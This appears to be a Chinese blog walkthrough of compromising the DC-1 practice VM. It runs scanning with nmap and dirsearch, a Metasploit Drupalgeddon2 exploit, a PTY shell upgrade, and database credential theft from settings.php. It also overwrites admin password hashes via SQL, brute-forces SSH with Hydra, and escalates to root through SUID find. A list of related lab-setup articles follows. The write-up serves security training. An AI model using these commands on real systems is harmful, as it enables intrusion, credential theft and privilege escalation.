kali渗透DC-1靶场搭建及渗透

最新推荐文章于 2025-10-10 16:54:36 发布
原创 最新推荐文章于 2025-10-10 16:54:36 发布 · 1.7k 阅读 · 31 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #服务器 #linux #安全

kali渗透DC-1

一.环境搭建

1.准备工具

kali

安装教程

DC-1靶机

官网下载DC-1
VMware直接导入镜像即可

导入选择路径即可
设置好相关操作
这样就成功了
出现这个界面就表示开启成功了。
然后再更改kali的网络连接模式为桥接模式,让DC靶机跟kali处于同一网段,这用kali才能扫出DC的主机,当然也可以设置为net,但必须DC-1靶机也设为net。

二.渗透过程

1.信息收集

IP地址收集

探测主机的工具有很多,常见的有arp-scan、nmap还有netdiscover等

arp-scan -l

该命令是探测当前网段的所有ip地址
在这里插入图片描述

然后查看靶机的mac地址,确定靶机的IP地址
在这里插入图片描述
DC-1的IP地址为

192.168.178.89

查看主机kali的IP地址

ifconfig

在这里插入图片描述

192.168.178.245

(查看自己电脑上的IP地址,每台电脑给虚拟机分配的IP地址不一样)

再用nmap

nmap -sP 192.168.178.0/24

ip后面改为了0/24, 在这里“192.168.178.0/24”表示的是这个网段的IP地址从从192.168.120.1开始,到192.168.178.254结束(192.168.1780.0和192.168.178.255有特殊含义不能当做ip地址);子网掩码是255.255.255.0

在这里插入图片描述
用netdiscover一样扫出IP

netdiscover

在这里插入图片描述

IP开放端口收集

用nmap来探测靶机开放端口

nmap -sV -p- 192.168.178.89

-sV 扫描目标主机端口上运行的软件信息

-p- 扫描全部端口0-65535
在这里插入图片描述
20和80端口是我们的突破口,80是http协议,我们用浏览器访问

网页信息收集

使用kali自带的工具whatweb扫描

whatweb -v 192.168.178.89

在这里插入图片描述
扫出CMS,然后再用dirsearch工具扫一下目录

dirsearch -u 192.168.178.89

在这里插入图片描述
扫描出来了特别多目录,基本上用不上
有用的信息

CMS是Drupal
Apache 2.2.22

PHP 5.4.45

jQuery 1.4.4

2.漏洞利用

知道了cms,我们可以从cms出发寻找漏洞(直接度娘),搜索一下drupal漏洞
在这里插入图片描述

查找

用Metasploit ,找一下漏洞,先打开工具
在这里插入图片描述

search Drupal

在这里插入图片描述
Drupal 框架漏洞还是有很多的,这里我们用漏洞等级高,且时间较新的2018年漏洞渗透

利用

利用漏洞

use exploit/unix/webapp/drupal_drupalgeddon2

在这里插入图片描述
然后查看一下这个漏洞模块的参数

show options

在这里插入图片描述
Current Setting是目前设置的内容

Required表示是否需要设置内容,yes为必须设置,no可以设置也可不设置

就上面来说RHOSTS需要set,但是没有内容

所以我们设置一下RHOSTS的内容(靶机的IP地址)

set RHOSTS 192.168.178.89

然后查看一下是否设置好了模块参数
在这里插入图片描述
设置好了参数开始渗透攻击

run

这里也可以用exploit(效果一样)
在这里插入图片描述
出现Meterpreter session 1 opened(kali和目标ip的连接)就说明攻击成功啦,接下来我们可以直接上shell

3.1获取shell

获取普通shell

shell

在这里插入图片描述
这是普通shell,然后执行一下ls

ls

在这里插入图片描述
成功

获取交互shell

利用python实现互交shell(这样就好看一点),使用的前提是攻击主机上必须装有python## 3.2数据库渗透

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述
可以看到这个shell的权限只是普通权限,还不是root,不过还能看看文件啦,先看一下发现的flag1.txt文件
在这里插入图片描述
每个好的CMS都需要一个配置文件,你也一样

再看看其他的flag,根据之前的提示看一下配置文件,一般来说配置文件都有一些特别重要的信息在里面,搞不好还能提权,百度Drupal配置文件,路径挺复杂的不过知道名字叫settings.php,我们可以用命令直接搜索并打开,内联执行

cat `find / -name settings.php`

在这里插入图片描述
找到了flag2(好像不重要的样子),还意外收获了一个数据库,给了账号密码,先登一下看看

3.2 数据库渗透

登陆给的账号密码

mysql -udbuser -pR0ck3t

在这里插入图片描述

登进去了,这样我们就可以修改数据库了,先看一下有什么

show datebases;

在这里插入图片描述
接着使用改数据库,并查看表

use drupaldb;show tables;

在这里插入图片描述
注意到users这个表,查看一下

select * from users;

得到两个用户
在这里插入图片描述

| admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR |

 | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg |

密码好复杂,应该不是明文,那想登进后台就很难了就很难了,我们可以通过修改admin的密码,或者是新加一个admin

修改admin的密码
我们得先找到加密文件,Drupal的加密脚本在目录下

/var/www/scripts/password-hash.sh

我们先退出mysql

exit;

打开加密的脚本

cat /var/www/scripts/password-hash.sh

在这里插入图片描述
这个脚本是用php写的,而且还能用php加参数运行,直接得到加密后的密码,这里我们设置一个密码123456 (可以随便设置)

php /var/www/scripts/password-hash.sh 123456

在这里插入图片描述
得到加密后的密码, 接着我们登入mysql修改一下admin跟Fred的密码

mysql -udbuser -pR0ck3t
 
use drupaldb;update users set pass = "$S$D1UQvb3x7lKoCSX6S9K.r.wB202Lsa/r7fkOj7CelJsSEMFDJjGv" where name = 'admin' or name = 'Fred';

密码修改成功

4.用户密码爆破

利用工具Hydra爆破flag4的密码

hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.178.89

爆破出密码orange,然后我们用kali连接

ssh flag4@192.168.178.89

输入orange登入
在这里插入图片描述
打开了flag4.txt

5.linux提权

利用find命令,找查具有SUID权限的可执行二进制文件

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述
执行root权限的命令找查文件

find / -name index.php -exec "/bin/sh" \;

在这里插入图片描述
已经提权成功了,接下来我们只要找到剩下的flag文件就算通关啦

cd /root 
ls
cat *

在这里插入图片描述
拿下!

DC1靶机渗透及测试过程
evenjoy_813的博客
09-17 776
本文记录了DC-1靶机渗透测试过程:首先通过nmap扫描发现靶机IP及开放端口(22/80/111等),识别出Drupal7系统后利用Metasploit的RCE漏洞获取www-data权限。通过SUID提权(利用find命令)直接获得root权限找到最终flag。过程中还依次发现4个flag:通过配置文件获取MySQL凭据(flag2),重置管理员密码登录后台找到flag3,破解shadow密码登录flag4用户。整个渗透涉及漏洞利用、权限提升和密码破解,主要工具包括nmap、Metasploit和Joh
kali搭建vulhub靶场
yxr520yj的博客
10-23 2555
vulhub漏洞靶场搭建
渗透测试】 DVWA 靶场搭建教程(超详细),收藏这一篇就够了!
最新发布
wangluo12138的博客
10-10 691
DVWA代表Damn Vulnerable Web Application,是一个用于学习和练习Web应用程序漏洞的开源漏洞应用程序。它被设计成一个易于安装和配置的漏洞应用程序,旨在帮助安全专业人员和爱好者了解和熟悉不同类型的Web应用程序漏洞。
WEB安全渗透测试-pikachu&DVWA&sqli-labs&upload-labs&xss-labs靶场搭建(超详细)
m0_69583059的博客
01-23 4089
对于web安全刚入门的小伙伴来说,漏洞靶场搭建是很重要的,可以通过靶场学以致用,对所学知识点进行巩固练习。下面和我一起搭建5个比较常用的初学者入门靶场,演示搭建环境:win11系统+phpstudy。
kali搭建Vulhub靶场
MateSnake的博客
05-11 3060
kali搭建Vulhub靶场
kali搭建vulhub靶场
weixin_52221158的博客
07-22 2815
kali搭建vulhub靶场
kali搭建靶场
qq_66985187的博客
07-11 575
git clone https://github.com/digininja/DVWA.git #DVWA项目克隆到本地。service apache2 start # 启动apache2。service apache2 status # 查看启动状态。打开网址:127.0.0.1,得到页面即搭建成功。如果有报错,手动下载压缩包,再上传到。pwd #用于显示工作目录。ls #显示文件目录列表。将DVWA整个文件夹移动到。网站的根目录,可以使用。
DC-1靶场搭建渗透
weixin_55772865的博客
06-13 827
回到/var/www目录下,执行加密脚本 cd ../ php scripts/password-hash.sh 666。1.回到该靶场的根目录下,在scripts目录下存在hash密码加密脚本password-hash.sh。4.扫描192.168.75.129发现就是我们要找的dc-1,且开放80端口,尝试访问一下。首先查找有suid权限的文件,发现find命令有suid权限,那就利用find命令进项提权。4.更新后用户名:admin 密码:666,去开放的80端口网页访问。
DC-1靶场搭建渗透实战详细过程(附Kali安装教程)
2401_86373757的博客
07-25 904
做得好!!!!希望你喜欢这次体验,并且学到了一些新技能。你可以通过 Twitter 联系我(@DCAU7),告诉我你对这段小旅程的看法。
DC-3靶场搭建渗透实战详细过程(DC靶场系列)
金 帛的博客
07-27 6439
DC-3靶场渗透过程
DC-1靶场搭建渗透实战详细过程(DC靶场系列)
热门推荐
金 帛的博客
06-29 2万+
DC-1靶场渗透过程,写的有点多,把许多方法尽可能地列出来了,也参考了很多别的文章,希望对刚学习web渗透的小白有所帮助吧!
DC-4靶场搭建渗透实战详细过程(DC靶场系列)
金 帛的博客
07-28 8649
dc-4靶场详细渗透过程
搭建DVWA渗透测试靶场
QQ670663的博客
01-20 6608
一、虚拟机的介绍及安装 1、双击运行安装文件,然后一直点下一步 2、我接受 3、勾选增强型····,然后继续下一步 4、去掉更新及加入体验计划,下一步 5、完成,后面填写激活码 二、Windows镜像操作系统安装 1、创建的虚拟机,使用典型 2、安装程序光盘映像文件 3、整体流程:新建虚拟机,选择典型—>选择安装程序光盘映像文件—>确定安装位置—>40G+拆分多个文件—>完成 仅主机模式:本机与新安装的虚拟机互通,但是虚拟机与其他的...
渗透测试靶场环境搭建
ytdd66的博客
02-29 2057
CTF(Capture The Flag)竞赛是网络安全领域的一种竞技活动,旨在测试参与者的网络安全技能。解题模式(Jeopardy):这是最常见的CTF竞赛模式。参赛队伍需要在规定的时间内解决主办方提供的网络安全技术挑战题目。题目类型涵盖逆向工程、漏洞挖掘与利用、Web渗透、密码学、取证、隐写、安全编程等多个方面。解题的数量和正确性将决定参赛队伍的排名和得分。攻防模式(Attack-Defense):在这种模式下,参赛队伍在网络空间中相互攻击和防守。
使用Kail搭建靶场
Aquarius_ego的博客
04-02 3327
使用Kail搭建靶场
kali搭建docker靶场
weixin_43959885的博客
01-20 928
kali搭建docker靶场 docker 技术又称容器技术,可以一键打包环境是我们的工作更加便捷化,我转写这篇博客的的目的是让我以后的朋友更加便捷的安装docker靶场,首先再次声明,我这篇博客是基于网上大部分朋友以及前辈的,所以勿喷 下载docker sudo apt update # 更新kali软件源 sudo apt install docker.io -y # 安装 docker docker -v #观察docker版本 (随着时间的推移docker版本也会升级,不要在意这一个版本)
【无标题】如何使用Kali搭建靶场
weixin_64676068的博客
04-05 5572
如何使用Kali搭建靶场 1.system start apache2.service (开启apache2服务) systemctl start mysql (开启MySQL服务) kaili自带的apache2和mysql...hahaha(脸上露出了笑容) 2.查看apache2和mysql的状态 systemctl status apache2.service systemctl status mysql apache2和mysql都...
Kali搭建DVWA——Web靶场
微笑涛声
11-11 1万+
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如sql注入,XSS,密码破解等常见漏洞。旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。
使用虚拟机搭建pikachu靶场
zxcvbnm123456x的博客
06-02 4547
1.我们的kali需要在VMware中搭建,基于linux的操作系统2.现在打开虚拟机3.此时的账号和密码都是“kali”,之后进行登录这时我们就来到了kali的主页面,此时第一步也完成了。
kali安装upload-labs靶场搭建
03-21
<think>好的,用户想了解如何在Kali Linux上安装和搭建upload-labs靶场。我需要提供一个清晰的步骤指南,确保每个环节都正确无误。首先,我应该考虑upload-labs的基本要求,比如PHP环境和数据库支持。Kali Linux默认可能已经安装了Apache和PHP,但可能需要确认版本是否兼容。用户可能需要安装Git来克隆仓库,所以第一步应该是更新系统并安装必要的依赖。 接下来,下载upload-labs项目。通常项目托管在GitHub上,所以使用git clone命令是标准做法。然后检查目标目录是否正确,比如是否放在/var/www/html/下,这是Apache的默认根目录。可能需要调整文件夹权限,确保Apache有读取权限。 然后配置Apache服务器。可能需要启用mod_rewrite,并调整虚拟主机设置。需要提醒用户检查Apache服务是否运行,以及防火墙设置是否允许HTTP流量。数据库方面,如果upload-labs需要MySQL,可能需要安装MariaDB并创建数据库,但根据我的记忆,upload-labs主要是文件上传漏洞练习,可能不需要数据库。不过需要确认这一点,避免遗漏步骤。 安装完成后,访问本地IP或localhost应该就能进入靶场。常见问题可能包括权限不足、端口冲突或者PHP模块未启用。比如,如果遇到500错误,可能需要检查PHP错误日志,或者确保.htaccess文件正确配置。此外,可能需要修改文件上传目录的权限,确保可写。 用户可能遇到的另一个问题是环境配置错误,比如PHP版本过高导致兼容性问题。这时需要降低PHP版本或修改代码适配。另外,SELinux或AppArmor可能会阻止Apache写入文件,需要临时关闭或调整策略。 最后,确保整个流程步骤清晰,语言简洁,避免使用复杂术语,让新手也能跟随操作。同时,生成的相关问题要针对常见后续疑问,比如环境配置、故障排除和靶场使用,帮助用户进一步学习。</think>### Kali Linux安装upload-labs靶场步骤 #### 一、环境准备 1. 更新系统包 ```bash sudo apt update && sudo apt upgrade -y ``` 2. 安装Apache和PHP ```bash sudo apt install apache2 php libapache2-mod-php -y ``` 3. 安装MySQL(可选,部分靶场需要) ```bash sudo apt install mariadb-server php-mysql -y ``` #### 二、下载upload-labs 1. 克隆Git仓库 ```bash cd /var/www/html/ sudo git clone https://github.com/c0ny1/upload-labs.git ``` 2. 设置目录权限 ```bash sudo chown -R www-data:www-data upload-labs/ sudo chmod -R 755 upload-labs/ ``` #### 三、配置Apache 1. 启用rewrite模块 ```bash sudo a2enmod rewrite ``` 2. 重启Apache服务 ```bash sudo systemctl restart apache2 ``` #### 四、访问靶场 浏览器访问: ``` http://localhost/upload-labs/ ``` ![靶场界面示例](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADIAAAAyCAYAAAAeP4ixAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAOxAAADsQBlSsOGwAAABl0RVh0U29mdHdhcmUAd3d3Lmlua3NjYXBlLm9yZ5vuPBoAAAI5SURBVGiB7dpPaE1xHMfx9/6QYtFCi4WUJEWK1L2GxGKhLDQbC6VkYWNhQ5QsLJQsbCwsLBSFQkqSFEkpRblS7r3m/n5Z3O7q6XfOOffe3zn3dH6r0/2d8/2d7zn3d8/53XOklFJKKaWUUkoppZRSSimllFJKKaV+O4M9yB1gFNgCzADGgRfAHeBd2Qk7BbkKbAQWAEuBNcAm4B5wCbhQZtJOQcYy2suAo8A24BhwHnhcZOIiQbJMAQ4Cu4DDwBHgRZGBygYJzQZOAnuA/cCjvAOUDRJaD5wCdgJ7gRdZLy4bZBx4DLwC3gPfgB/AJ+Bm+9g8YFm7b3aRicoGuQ7sBt4Ck8BP4Gv78zfgfPvYOuBskYnKBpkAruTo9xV4XnSiskHy6mn1k4H9wGHgJPAkT2eTIKuB08B24ECeziZB1gJngC3A3jydTYKsA84C64FdeTqbBFkJnAPWAJvzdDYJshg4D6wCNubpbBJkHnABWAGsztPZJMgM4CKwFFiWp7NJkGnAJWAxsDBPZ5MgU4HLwEJgXp7OJkEmA1eA+cDcPJ1NgvwArgFzgNl5OpsE+QlcBWYDs/J0NgnyE7gBzARm5OlsEuQXcBOYDkzP09kkyDhwC5gGTMvT2STIL+B2u206T2eTIPeBSe0guf5oJkEeAhPtILn+aCZBHgHf20Fy/dFMgjwBPrWD5PqjmQR5CnxoB8n1RzMJ8gx42w6S649mEuQ58LodJNcfzSTIC+BFO0iuP5pJkJfA03aQXH80kyCvgEftILn+aCZBXgP32kFy/dFMgjwAbrWD5PqjmQR5ClxvB8n1RzMJ8gq40g6S649mEuQ1cLkdJNcfzSTIG+BiO0iuP5pJkHfA+XaQXH80kyAfgDPtILn+aCZBPrY+zrSD5PqjmQT51Po43Q6S649mEuRz6+NUO0iuP5pJkC+tjxPtILn+aCZBvrU+jreD5PqjmQT53vo41g6S649mEuRH6+NoO0iuP5pJkPHWx5F2kFx/NJMgE62Pw+0guf5oJkEmWx8H20Fy/dFMgvxsfexvB8n1RzMJ8qv1sa8dJNcfzSTIROtjbztIrj+aSZDJ1seudpBcfzSTIP8Bw3TpXxVw/1QAAAAASUVORK5CYII=) #### 五、常见问题解决 1. **403禁止访问错误** 修改Apache配置: ```bash sudo nano /etc/apache2/apache2.conf ``` 找到`<Directory /var/www/>`段落,将`AllowOverride None`改为`AllowOverride All` 2. **文件上传失败** 检查上传目录权限: ```bash sudo chmod 777 /var/www/html/upload-labs/upload/ ``` [^1]: 引用包含系统信息查看和目录操作相关内容 [^2]: 引用涉及PHP环境搭建和漏洞利用过程
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值